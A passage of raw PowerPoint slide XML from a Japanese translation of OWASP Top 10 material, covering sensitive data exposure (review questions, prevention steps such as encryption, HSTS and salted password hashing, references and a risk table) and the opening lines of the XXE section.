                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>初期値のままの暗号鍵の使用、弱い暗号鍵を生成または再利用、適切な暗号鍵管理または鍵のローテーションをしていない、これらの該当する箇所はないか。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ユーザエージェント（ブラウザ）のセキュリティに関するディレクティブやヘッダーが欠落しているなど、暗号化が強制されていない箇所はないか。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリ、メールクライアントなどのユーザエージェントが受信したサーバ証明書が正当なものか検証していない箇所はないか。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Data Protection (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、そして</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を参照。</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de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId7"/>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8"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</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OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</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5"/>
              </a:rPr>
              <a:t>9</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6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Transport Layer Protection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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</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12"/>
              </a:rPr>
              <a:t>Cryptographic Storage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Security Headers Project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4"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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CWE-220: Exposure of sens. information through data queries</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CWE-310: Cryptographic Issues</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8"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption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9"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage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0"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</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1"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</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21"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</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2"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)</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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最低限実施すべきことを以下に挙げます。そして、参考資料を検討してください</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションごとに処理するデータ、保存するデータ、送信するデータを分類する。そして、どのデータがプライバシー関連の法律・規則の要件に該当するか、またどのデータがビジネス上必要なデータか判定する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前述の分類にもとにアクセス制御を実装する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>必要のない機微な情報を保存しない。できる限りすぐにそのような機微な情報を破棄するか、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>に準拠したトークナイゼーションまたはトランケーションを行う。データが残っていなければ盗まれない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保存時にすべての機微な情報を暗号化しているか確認する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最新の暗号強度の高い標準アルゴリズム、プロトコル、暗号鍵を実装しているか確認する。そして適切に暗号鍵を管理する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前方秘匿性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(PFS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を有効にした</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、サーバサイドによる暗号スイートの優先度決定、セキュアパラメータなどのセキュアなプロトコルで、通信経路上のすべてのデータを暗号化する。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP Strict Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のようなディレクティブで暗号化を強制する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>パスワードを保存する際、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のようなワークファクタ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>遅延ファクタ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のある、強くかつ適応可能なレベルのソルト付きハッシュ関数を用いる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>設定とその設定値がそれぞれ独立して効果があるか検証する。</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A3</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機微な情報の露出</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1397411360"/>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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>攻撃者は、ブラウザのようなクライアントからデータを送信するときに暗号化通信を直接攻撃するよりも、暗号鍵を盗み出したり、中間者攻撃を仕掛けたり、サーバ上にある平文のデータを盗み出します。一般的には、このリスクでは手動による攻撃を必要とします。あらかじめ盗み出したパスワードデータベースには、グラフィック処理ユニット</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(GPU)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を使って総当たり攻撃できます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ここ数年以降、このリスクはもっとも一般的で影響力のある攻撃になりました。もっとも一般的な攻撃手法は、暗号化されていない機微な情報を狙ったものです。暗号化されている場合でも、弱い暗号鍵の生成と管理、弱い暗号アルゴリズム、プロトコル、暗号スイートの利用を狙った攻撃手法が知られています。特に、弱いハッシュ関数によるパスワードハッシュを狙った攻撃がよく知られています。データを送信する場合には、サーバサイドの弱点を容易に検知できますが、サーバ内に保存したデータの問題の検知は困難です。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>保護に失敗し保護すべきすべての情報が台無しになることは頻繁に生じています。多くの場合、これらの情報には健康記録、認証情報、個人情報、クレジットカードなどの機微な情報</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(PII)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>が含まれています。これらのデータについてはしばしば、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>EU</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>における</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>GDPR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や各地域のプライバシー関連の法律など、法律や規則で定められた保護が要求されます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="2880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2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>多くの公開サーバでの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>問題が発見されています。また、組み込み機器に対する攻撃も確認されています。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>は、深くネストされた依存関係を含むさまざまな予期しない場所で発生します。最も簡単な攻撃方法は、サーバが受け入れる場合に、悪質な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ファイルをアップロードすることです。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
